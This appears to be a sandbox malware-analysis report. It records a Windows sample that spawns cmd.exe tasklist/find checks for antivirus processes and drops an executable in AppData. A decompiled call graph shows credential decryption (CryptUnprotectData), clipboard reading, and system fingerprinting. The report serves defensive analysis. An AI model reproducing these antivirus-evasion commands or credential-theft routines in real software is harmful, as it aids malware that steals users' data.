                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:20
                                                                                                                                    Start time:10:54:54
                                                                                                                                    Start date:01/01/2025
                                                                                                                                    Path:C:\Windows\System32\tasklist.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:tasklist /FI "IMAGENAME eq avastui.exe" /FO CSV /NH
                                                                                                                                    Imagebase:0x7ff6c21b0000
                                                                                                                                    File size:106'496 bytes
                                                                                                                                    MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:21
                                                                                                                                    Start time:10:54:54
                                                                                                                                    Start date:01/01/2025
                                                                                                                                    Path:C:\Windows\System32\find.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:find /I "avastui.exe"
                                                                                                                                    Imagebase:0x7ff6bee80000
                                                                                                                                    File size:17'920 bytes
                                                                                                                                    MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:22
                                                                                                                                    Start time:10:54:54
                                                                                                                                    Start date:01/01/2025
                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH | find /I "avgui.exe"
                                                                                                                                    Imagebase:0x7ff692a20000
                                                                                                                                    File size:289'792 bytes
                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:23
                                                                                                                                    Start time:10:54:54
                                                                                                                                    Start date:01/01/2025
                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                                                    File size:862'208 bytes
                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:24
                                                                                                                                    Start time:10:54:54
                                                                                                                                    Start date:01/01/2025
                                                                                                                                    Path:C:\Windows\System32\tasklist.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:tasklist /FI "IMAGENAME eq avgui.exe" /FO CSV /NH
                                                                                                                                    Imagebase:0x7ff6c21b0000
                                                                                                                                    File size:106'496 bytes
                                                                                                                                    MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:25
                                                                                                                                    Start time:10:54:54
                                                                                                                                    Start date:01/01/2025
                                                                                                                                    Path:C:\Windows\System32\find.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:find /I "avgui.exe"
                                                                                                                                    Imagebase:0x7ff6bee80000
                                                                                                                                    File size:17'920 bytes
                                                                                                                                    MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:26
                                                                                                                                    Start time:10:54:55
                                                                                                                                    Start date:01/01/2025
                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH | find /I "nswscsvc.exe"
                                                                                                                                    Imagebase:0x7ff692a20000
                                                                                                                                    File size:289'792 bytes
                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:27
                                                                                                                                    Start time:10:54:55
                                                                                                                                    Start date:01/01/2025
                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                                                    File size:862'208 bytes
                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:28
                                                                                                                                    Start time:10:54:55
                                                                                                                                    Start date:01/01/2025
                                                                                                                                    Path:C:\Windows\System32\tasklist.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:tasklist /FI "IMAGENAME eq nswscsvc.exe" /FO CSV /NH
                                                                                                                                    Imagebase:0x7ff6c21b0000
                                                                                                                                    File size:106'496 bytes
                                                                                                                                    MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:29
                                                                                                                                    Start time:10:54:55
                                                                                                                                    Start date:01/01/2025
                                                                                                                                    Path:C:\Windows\System32\find.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:find /I "nswscsvc.exe"
                                                                                                                                    Imagebase:0x7ff6bee80000
                                                                                                                                    File size:17'920 bytes
                                                                                                                                    MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:30
                                                                                                                                    Start time:10:54:55
                                                                                                                                    Start date:01/01/2025
                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:"cmd.exe" /C tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH | find /I "sophoshealth.exe"
                                                                                                                                    Imagebase:0x7ff692a20000
                                                                                                                                    File size:289'792 bytes
                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:31
                                                                                                                                    Start time:10:54:55
                                                                                                                                    Start date:01/01/2025
                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                    Imagebase:0x7ff6d64d0000
                                                                                                                                    File size:862'208 bytes
                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:32
                                                                                                                                    Start time:10:54:55
                                                                                                                                    Start date:01/01/2025
                                                                                                                                    Path:C:\Windows\System32\tasklist.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:tasklist /FI "IMAGENAME eq sophoshealth.exe" /FO CSV /NH
                                                                                                                                    Imagebase:0x7ff6c21b0000
                                                                                                                                    File size:106'496 bytes
                                                                                                                                    MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:33
                                                                                                                                    Start time:10:54:55
                                                                                                                                    Start date:01/01/2025
                                                                                                                                    Path:C:\Windows\System32\find.exe
                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                    Commandline:find /I "sophoshealth.exe"
                                                                                                                                    Imagebase:0x7ff6bee80000
                                                                                                                                    File size:17'920 bytes
                                                                                                                                    MD5 hash:4BF76A28D31FC73AA9FC970B22D056AF
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Has exited:true

                                                                                                                                    Target ID:34
                                                                                                                                    Start time:10:54:59
                                                                                                                                    Start date:01/01/2025
                                                                                                                                    Path:C:\Users\user\AppData\Roaming\ColorStreamLib\ColorStreamLib.exe
                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                    Commandline:"C:\Users\user\AppData\Roaming\ColorStreamLib\ColorStreamLib.exe"
                                                                                                                                    Imagebase:0x400000
                                                                                                                                    File size:846'404'211 bytes
                                                                                                                                    MD5 hash:A42E953364198E087438838FD14040E7
                                                                                                                                    Has elevated privileges:true
                                                                                                                                    Has administrator privileges:true
                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                    Has exited:false

                                                                                                                                    Reset < >

                                                                                                                                      Execution Graph

                                                                                                                                      Execution Coverage:9.3%
                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                      Signature Coverage:72.3%
                                                                                                                                      Total number of Nodes:347
                                                                                                                                      Total number of Limit Nodes:12
                                                                                                                                      execution_graph 13217 79d338 13218 79d360 13217->13218 13221 7c6b50 13218->13221 13220 79d4ac 13222 7c6b80 CoCreateInstance 13221->13222 13224 7c730c 13222->13224 13225 7c6dc6 SysAllocString 13222->13225 13226 7c731c GetVolumeInformationW 13224->13226 13228 7c6e88 13225->13228 13234 7c7341 13226->13234 13229 7c72fb SysFreeString 13228->13229 13230 7c6e90 CoSetProxyBlanket 13228->13230 13229->13224 13231 7c6eb0 SysAllocString 13230->13231 13232 7c72f1 13230->13232 13235 7c6f70 13231->13235 13232->13229 13234->13220 13235->13235 13236 7c6fac SysAllocString 13235->13236 13238 7c6fd7 13236->13238 13237 7c72db SysFreeString SysFreeString 13237->13232 13238->13237 13239 7c72d1 13238->13239 13240 7c701b VariantInit 13238->13240 13239->13237 13242 7c7070 13240->13242 13241 7c72c0 VariantClear 13241->13239 13242->13241 13033 7a60f8 13034 7a613d 13033->13034 13035 7a6102 13033->13035 13037 7a6118 13033->13037 13039 7a6179 13033->13039 13041 7a626e 13033->13041 13034->13035 13034->13039 13034->13041 13043 7cdc10 13034->13043 13049 7cdb10 13037->13049 13039->13035 13039->13041 13053 7cb5b0 LdrInitializeThunk 13039->13053 13041->13035 13042 7a6412 CryptUnprotectData 13041->13042 13042->13035 13045 7cdc30 13043->13045 13044 7cdd9e 13044->13039 13047 7cdcbf 13045->13047 13054 7cb5b0 LdrInitializeThunk 13045->13054 13047->13044 13055 7cb5b0 LdrInitializeThunk 13047->13055 13051 7cdb30 13049->13051 13050 7cdbbe 13050->13034 13051->13050 13056 7cb5b0 LdrInitializeThunk 13051->13056 13053->13041 13054->13047 13055->13044 13056->13050 13057 7b08f3 13058 7b0980 13057->13058 13061 7a4d70 13058->13061 13062 7a4dc0 13061->13062 13062->13062 13067 7cd760 13062->13067 13064 7a4e8b 13065 7cd760 LdrInitializeThunk 13064->13065 13066 7a5139 13065->13066 13069 7cd770 13067->13069 13068 7cd8ce 13068->13064 13069->13068 13071 7cb5b0 LdrInitializeThunk 13069->13071 13071->13068 13072 798670 13074 79867f 13072->13074 13073 79883c ExitProcess 13074->13073 13075 798694 GetCurrentProcessId GetCurrentThreadId 13074->13075 13078 7987a9 13074->13078 13076 7986d9 SHGetSpecialFolderPathW GetForegroundWindow 13075->13076 13077 7986ce 13075->13077 13076->13078 13077->13076 13078->13073 13079 79d5f3 13080 79d650 13079->13080 13082 7cb5b0 LdrInitializeThunk 13080->13082 13082->13080 13083 7c9a70 13084 7c9a90 13083->13084 13085 7c9afe 13084->13085 13091 7cb5b0 LdrInitializeThunk 13084->13091 13090 7c9c2e 13085->13090 13092 7c9a00 13085->13092 13088 7c9ba1 13089 7cb5b0 LdrInitializeThunk 13088->13089 13088->13090 13089->13090 13091->13085 13095 7ccc30 13092->13095 13094 7c9a0a RtlAllocateHeap 13096 7ccc40 13095->13096 13096->13094 13096->13096 13102 7cddf0 13103 7cde10 13102->13103 13106 7cde9f 13103->13106 13108 7cb5b0 LdrInitializeThunk 13103->13108 13104 7cdf7e 13106->13104 13109 7cb5b0 LdrInitializeThunk 13106->13109 13108->13106 13109->13104 13243 79c9b5 CoInitializeSecurity 13110 7c1cf1 13113 7a4d60 13110->13113 13112 7c1cf6 CoSetProxyBlanket 13113->13112 13244 7bdab4 13245 7bdada 13244->13245 13246 7bdbcb GetComputerNameExA 13245->13246 13248 7bdc20 13246->13248 13247 7bdc8b GetComputerNameExA 13249 7bdcf0 13247->13249 13248->13247 13248->13248 13114 7cbcea 13115 7cbcf4 13114->13115 13115->13115 13116 7cbdde 13115->13116 13118 7cb5b0 LdrInitializeThunk 13115->13118 13118->13116 13119 7b14e0 13120 7b1540 13119->13120 13121 7b14ee 13119->13121 13125 7b1600 13121->13125 13123 7b15bc 13123->13120 13124 7afa00 LdrInitializeThunk 13123->13124 13124->13120 13126 7b1610 13125->13126 13126->13126 13129 7cd920 13126->13129 13128 7b16ef 13130 7cd940 13129->13130 13130->13130 13131 7cdabe 13130->13131 13133 7cb5b0 LdrInitializeThunk 13130->13133 13131->13128 13133->13131 13134 7c0363 CoSetProxyBlanket 13250 79c826 CoInitializeEx CoInitializeEx 13135 7bd05a 13137 7bd090 13135->13137 13136 7bd17e 13137->13136 13139 7cb5b0 LdrInitializeThunk 13137->13139 13139->13136 13251 79d918 13253 79d930 13251->13253 13252 79d992 13255 79daae 13252->13255 13325 7cb5b0 LdrInitializeThunk 13252->13325 13253->13252 13324 7cb5b0 LdrInitializeThunk 13253->13324 13271 7b3a00 13255->13271 13258 79dae9 13280 7b4120 13258->13280 13260 79db05 13290 7b43b0 13260->13290 13262 79db24 13302 7b6c00 13262->13302 13266 79db4c 13314 7b7670 13266->13314 13268 79db55 13326 7c27a0 OpenClipboard 13268->13326 13272 7b3a60 13271->13272 13272->13272 13273 7b3b7a 13272->13273 13274 7b3e47 13272->13274 13277 7b3cb1 13272->13277 13278 7cd920 LdrInitializeThunk 13272->13278 13273->13258 13274->13273 13336 7b1be0 13274->13336 13276 7b3e31 GetLogicalDrives 13279 7cd920 LdrInitializeThunk 13276->13279 13277->13273 13277->13274 13277->13276 13277->13277 13278->13277 13279->13274 13281 7b41c0 13280->13281 13281->13281 13282 7b42af 13281->13282 13283 7ce490 RtlAllocateHeap LdrInitializeThunk 13281->13283 13285 7b4569 13281->13285 13289 7b4385 13281->13289 13351 7af980 13282->13351 13283->13281 13355 7ce110 13285->13355 13287 7b459d 13287->13289 13363 7cdfc0 13287->13363 13289->13260 13291 7b43be 13290->13291 13292 7cdfc0 LdrInitializeThunk 13291->13292 13293 7b4278 13292->13293 13294 7b42af 13293->13294 13295 7ce490 RtlAllocateHeap LdrInitializeThunk 13293->13295 13296 7b4569 13293->13296 13299 7b4385 13293->13299 13297 7af980 2 API calls 13294->13297 13295->13293 13298 7ce110 2 API calls 13296->13298 13297->13299 13300 7b459d 13298->13300 13299->13262 13300->13299 13301 7cdfc0 LdrInitializeThunk 13300->13301 13301->13300 13303 79db43 13302->13303 13304 7b6c2c 13302->13304 13306 7b7380 13303->13306 13304->13303 13304->13304 13305 7cdfc0 LdrInitializeThunk 13304->13305 13305->13304 13307 7b73a0 13306->13307 13308 7b73de 13307->13308 13370 7cb5b0 LdrInitializeThunk 13307->13370 13309 7c9a00 RtlAllocateHeap 13308->13309 13313 7b748e 13308->13313 13311 7b743b 13309->13311 13311->13313 13371 7cb5b0 LdrInitializeThunk 13311->13371 13313->13266 13313->13313 13372 7b7690 13314->13372 13316 7b7684 13316->13268 13317 7b7679 13317->13316 13388 7c7c60 13317->13388 13319 7cdb10 LdrInitializeThunk 13323 7b7e84 13319->13323 13320 7b7eae 13320->13268 13321 7cd760 LdrInitializeThunk 13321->13323 13322 7b8071 CopyFileW 13322->13323 13323->13319 13323->13320 13323->13321 13323->13322 13324->13252 13325->13255 13327 7c27c4 GetClipboardData 13326->13327 13328 79db9f 13326->13328 13329 7c27e7 GlobalLock 13327->13329 13330 7c27e2 13327->13330 13333 7c27fd 13329->13333 13331 7c2931 CloseClipboard 13330->13331 13331->13328 13332 7c2925 GlobalUnlock 13332->13331 13334 7c283d GetWindowLongW 13333->13334 13335 7c280b 13333->13335 13334->13335 13335->13332 13337 7cd760 LdrInitializeThunk 13336->13337 13339 7b1c20 13337->13339 13338 7b235e 13338->13273 13339->13338 13340 7c9a00 RtlAllocateHeap 13339->13340 13341 7b1c5e 13340->13341 13345 7b1ce1 13341->13345 13348 7cb5b0 LdrInitializeThunk 13341->13348 13343 7c9a00 RtlAllocateHeap 13343->13345 13344 7b22cf 13344->13338 13350 7cb5b0 LdrInitializeThunk 13344->13350 13345->13343 13345->13344 13349 7cb5b0 LdrInitializeThunk 13345->13349 13348->13341 13349->13345 13350->13344 13352 7af9c0 13351->13352 13352->13352 13353 7b1be0 2 API calls 13352->13353 13354 7af9f4 13353->13354 13354->13289 13356 7ce130 13355->13356 13357 7ce1ae 13356->13357 13367 7cb5b0 LdrInitializeThunk 13356->13367 13358 7c9a00 RtlAllocateHeap 13357->13358 13360 7ce338 13357->13360 13361 7ce275 13358->13361 13360->13287 13361->13360 13368 7cb5b0 LdrInitializeThunk 13361->13368 13364 7cdfe0 13363->13364 13365 7ce0df 13364->13365 13369 7cb5b0 LdrInitializeThunk 13364->13369 13365->13287 13367->13357 13368->13360 13369->13365 13370->13308 13371->13313 13373 7b76d0 13372->13373 13373->13373 13395 7c9a70 13373->13395 13375 7b772c 13403 7c9d70 13375->13403 13380 7b7bf7 13380->13317 13381 7b7744 13420 7c9eb0 13381->13420 13382 7b7cd6 13382->13317 13382->13380 13382->13382 13383 7cd760 LdrInitializeThunk 13382->13383 13384 7cdb10 LdrInitializeThunk 13382->13384 13386 7b8071 CopyFileW 13382->13386 13383->13382 13384->13382 13386->13382 13387 7b77f6 13387->13380 13387->13381 13387->13382 13416 7ca1a0 13387->13416 13393 7c7c90 13388->13393 13389 7cdfc0 LdrInitializeThunk 13389->13393 13391 7c7dfc 13391->13323 13393->13389 13393->13391 13431 7ce490 13393->13431 13439 7cec00 13393->13439 13447 7cb5b0 LdrInitializeThunk 13393->13447 13396 7c9a90 13395->13396 13397 7c9afe 13396->13397 13424 7cb5b0 LdrInitializeThunk 13396->13424 13398 7c9a00 RtlAllocateHeap 13397->13398 13402 7c9c2e 13397->13402 13400 7c9ba1 13398->13400 13400->13402 13425 7cb5b0 LdrInitializeThunk 13400->13425 13402->13375 13404 7b7738 13403->13404 13405 7c9d81 13403->13405 13404->13381 13404->13387 13407 7ca260 13404->13407 13405->13404 13426 7cb5b0 LdrInitializeThunk 13405->13426 13409 7ca2b0 13407->13409 13408 7ca9fe 13408->13387 13415 7ca31e 13409->13415 13427 7cb5b0 LdrInitializeThunk 13409->13427 13411 7ca985 13411->13408 13428 7cb5b0 LdrInitializeThunk 13411->13428 13413 7ca1a0 LdrInitializeThunk 13413->13415 13414 7cb5b0 LdrInitializeThunk 13414->13415 13415->13408 13415->13411 13415->13413 13415->13414 13417 7ca1c0 13416->13417 13419 7ca22e 13417->13419 13429 7cb5b0 LdrInitializeThunk 13417->13429 13419->13387 13421 7c9eba 13420->13421 13422 7c9f3e 13420->13422 13421->13422 13430 7cb5b0 LdrInitializeThunk 13421->13430 13422->13382 13424->13397 13425->13402 13426->13404 13427->13415 13428->13408 13429->13419 13430->13422 13432 7ce4b0 13431->13432 13433 7ce52e 13432->13433 13448 7cb5b0 LdrInitializeThunk 13432->13448 13434 7ce65e 13433->13434 13435 7c9a00 RtlAllocateHeap 13433->13435 13434->13393 13437 7ce5a5 13435->13437 13437->13434 13449 7cb5b0 LdrInitializeThunk 13437->13449 13440 7cec11 13439->13440 13441 7cedae 13440->13441 13450 7cb5b0 LdrInitializeThunk 13440->13450 13443 7c9a00 RtlAllocateHeap 13441->13443 13445 7cef0e 13441->13445 13444 7cee29 13443->13444 13444->13445 13451 7cb5b0 LdrInitializeThunk 13444->13451 13445->13393 13447->13393 13448->13433 13449->13434 13450->13441 13451->13445 13140 79abd0 13141 79ac60 13140->13141 13142 79ac85 13141->13142 13144 7cb550 13141->13144 13145 7cb568 13144->13145 13146 7cb58a 13144->13146 13147 7cb590 13144->13147 13145->13147 13149 7cb57b RtlReAllocateHeap 13145->13149 13148 7c9a00 RtlAllocateHeap 13146->13148 13147->13141 13148->13147 13149->13147 13150 7c51d5 13153 7c51f8 13150->13153 13151 7c524d 13153->13151 13154 7cb5b0 LdrInitializeThunk 13153->13154 13154->13153 13155 7a6ed1 13156 7a6f20 13155->13156 13157 7a6f61 13156->13157 13164 7a7043 13156->13164 13166 7acc00 13157->13166 13159 7a7387 13163 7acc00 LdrInitializeThunk 13159->13163 13160 7a7032 13161 7a7320 13162 7acc00 LdrInitializeThunk 13161->13162 13162->13159 13163->13160 13164->13159 13164->13160 13164->13161 13165 7cd920 LdrInitializeThunk 13164->13165 13165->13164 13167 7acc75 13166->13167 13168 7acc2a 13166->13168 13167->13160 13168->13167 13169 7a4d70 LdrInitializeThunk 13168->13169 13170 7acd26 13169->13170 13171 7a4d70 LdrInitializeThunk 13170->13171 13172 7acdb4 13171->13172 13173 7a4d70 LdrInitializeThunk 13172->13173 13174 7ace51 13173->13174 13175 7a4d70 LdrInitializeThunk 13174->13175 13176 7acefe 13175->13176 13177 7a4d70 LdrInitializeThunk 13176->13177 13178 7acf72 13177->13178 13178->13160 13179 7cbad0 13180 7cbaf0 13179->13180 13181 7cbb5e 13180->13181 13186 7cb5b0 LdrInitializeThunk 13180->13186 13185 7cb5b0 LdrInitializeThunk 13181->13185 13184 7cbc71 13185->13184 13186->13181 13187 7c67d0 13188 7c67f5 13187->13188 13192 7c68d1 13188->13192 13196 7cb5b0 LdrInitializeThunk 13188->13196 13190 7c6aea 13192->13190 13193 7c69cf 13192->13193 13195 7cb5b0 LdrInitializeThunk 13192->13195 13193->13190 13197 7cb5b0 LdrInitializeThunk 13193->13197 13195->13192 13196->13188 13197->13193 13198 79dbce 13201 7c2950 13198->13201 13202 7c2985 GetSystemMetrics GetSystemMetrics 13201->13202 13203 7c29c8 13202->13203 13452 79df82 13458 7993c0 13452->13458 13454 79df8a CoUninitialize 13455 79dfb0 13454->13455 13456 79e32a CoUninitialize 13455->13456 13457 79e350 13456->13457 13459 7993d4 13458->13459 13459->13454 13460 7cec00 13461 7cec11 13460->13461 13462 7cedae 13461->13462 13468 7cb5b0 LdrInitializeThunk 13461->13468 13464 7c9a00 RtlAllocateHeap 13462->13464 13466 7cef0e 13462->13466 13465 7cee29 13464->13465 13465->13466 13469 7cb5b0 LdrInitializeThunk 13465->13469 13468->13462 13469->13466 13204 7c9a42 13205 7c9a50 13204->13205 13206 7c9a52 13204->13206 13207 7c9a57 RtlFreeHeap 13206->13207 13208 7be145 13209 7be170 13208->13209 13209->13209 13210 7be2a7 GetPhysicallyInstalledSystemMemory 13209->13210 13211 7be2cf 13210->13211 13211->13211 13212 7cb9c3 13214 7cb9f0 13212->13214 13213 7cba5e 13214->13213 13216 7cb5b0 LdrInitializeThunk 13214->13216 13216->13213

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 1 7c6b50-7c6b7a 2 7c6b80-7c6b9d 1->2 2->2 3 7c6b9f-7c6baf 2->3 4 7c6bb0-7c6bda 3->4 4->4 5 7c6bdc-7c6c22 4->5 6 7c6c30-7c6c4d 5->6 6->6 7 7c6c4f-7c6c6b 6->7 9 7c6d0a-7c6d15 7->9 10 7c6c71-7c6c7a 7->10 12 7c6d20-7c6d64 9->12 11 7c6c80-7c6ca9 10->11 11->11 13 7c6cab-7c6cc3 11->13 12->12 14 7c6d66-7c6dc0 CoCreateInstance 12->14 15 7c6cd0-7c6cfb 13->15 16 7c730c-7c733f call 7ccfe0 GetVolumeInformationW 14->16 17 7c6dc6-7c6dff 14->17 15->15 19 7c6cfd-7c6d02 15->19 23 7c7349-7c734b 16->23 24 7c7341-7c7345 16->24 20 7c6e00-7c6e5d 17->20 19->9 20->20 22 7c6e5f-7c6e8a SysAllocString 20->22 27 7c72fb-7c7308 SysFreeString 22->27 28 7c6e90-7c6eaa CoSetProxyBlanket 22->28 26 7c735d-7c7368 23->26 24->23 29 7c736a-7c7371 26->29 30 7c7374-7c7382 26->30 27->16 31 7c6eb0-7c6ecf 28->31 32 7c72f1-7c72f7 28->32 29->30 33 7c7390-7c73a4 30->33 35 7c6ed0-7c6eef 31->35 32->27 33->33 34 7c73a6-7c73d3 33->34 36 7c73e0-7c73f2 34->36 35->35 37 7c6ef1-7c6f6b SysAllocString 35->37 36->36 38 7c73f4-7c741f call 7ae5f0 36->38 39 7c6f70-7c6faa 37->39 43 7c7420-7c7428 38->43 39->39 41 7c6fac-7c6fd9 SysAllocString 39->41 46 7c6fdf-7c7001 41->46 47 7c72db-7c72ed SysFreeString * 2 41->47 43->43 45 7c742a-7c742c 43->45 48 7c7350-7c7357 45->48 49 7c7432-7c7442 call 798010 45->49 54 7c7007-7c700a 46->54 55 7c72d1-7c72d7 46->55 47->32 48->26 51 7c7447-7c744e 48->51 49->48 54->55 56 7c7010-7c7015 54->56 55->47 56->55 57 7c701b-7c7069 VariantInit 56->57 58 7c7070-7c70a2 57->58 58->58 59 7c70a4-7c70ba 58->59 60 7c70be-7c70c4 59->60 61 7c70ca-7c70d0 60->61 62 7c72c0-7c72cd VariantClear 60->62 61->62 63 7c70d6-7c70e4 61->63 62->55 64 7c711d 63->64 65 7c70e6-7c70eb 63->65 67 7c711f-7c713b call 797f90 64->67 66 7c70fc-7c7100 65->66 69 7c70f0 66->69 70 7c7102-7c710b 66->70 75 7c726e-7c727f 67->75 76 7c7141-7c714b 67->76 72 7c70f1-7c70fa 69->72 73 7c710d-7c7110 70->73 74 7c7112-7c7116 70->74 72->66 72->67 73->72 74->72 77 7c7118-7c711b 74->77 79 7c7286-7c7296 75->79 80 7c7281 75->80 76->75 78 7c7151-7c7159 76->78 77->72 81 7c7160-7c716c 78->81 82 7c729d-7c72bd call 797fc0 call 797fa0 79->82 83 7c7298 79->83 80->79 84 7c716e-7c7173 81->84 85 7c7180-7c7186 81->85 82->62 83->82 87 7c7220-7c7224 84->87 88 7c7188-7c718b 85->88 89 7c71a4-7c71b0 85->89 95 7c7226-7c722c 87->95 88->89 91 7c718d-7c71a2 88->91 92 7c7238-7c7240 89->92 93 7c71b6-7c71b9 89->93 91->87 92->95 96 7c7242-7c7245 92->96 93->92 97 7c71bb-7c721f 93->97 95->75 99 7c722e-7c7230 95->99 100 7c726a-7c726c 96->100 101 7c7247-7c7268 96->101 97->87 99->81 102 7c7236 99->102 100->87 101->87 102->75
                                                                                                                                      APIs
                                                                                                                                      • CoCreateInstance.OLE32(007D068C,00000000,00000001,007D067C,00000000), ref: 007C6DB8
                                                                                                                                      • SysAllocString.OLEAUT32(58984697), ref: 007C6E64
                                                                                                                                      • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 007C6EA2
                                                                                                                                      • SysAllocString.OLEAUT32(C412C216), ref: 007C6EF6
                                                                                                                                      • SysAllocString.OLEAUT32(26E024D0), ref: 007C6FB1
                                                                                                                                      • VariantInit.OLEAUT32(1807061D), ref: 007C7020
                                                                                                                                      • SysFreeString.OLEAUT32(DA1CD8DB), ref: 007C72E2
                                                                                                                                      • SysFreeString.OLEAUT32(?), ref: 007C72EB
                                                                                                                                      • SysFreeString.OLEAUT32(00000000), ref: 007C72FC
                                                                                                                                      • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 007C7338
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000000.00000002.3979969235.0000000000791000.00000020.00001000.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                                      • Associated: 00000000.00000002.3979950096.0000000000790000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980000858.00000000007CF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980021009.00000000007D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      • Associated: 00000000.00000002.3980046754.00000000007E3000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_0_2_790000_qnUFsmyxMm.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: String$AllocFree$BlanketCreateInformationInitInstanceProxyVariantVolume
                                                                                                                                      • String ID: )*$56$&
                                                                                                                                      • API String ID: 2247799857-3848306231
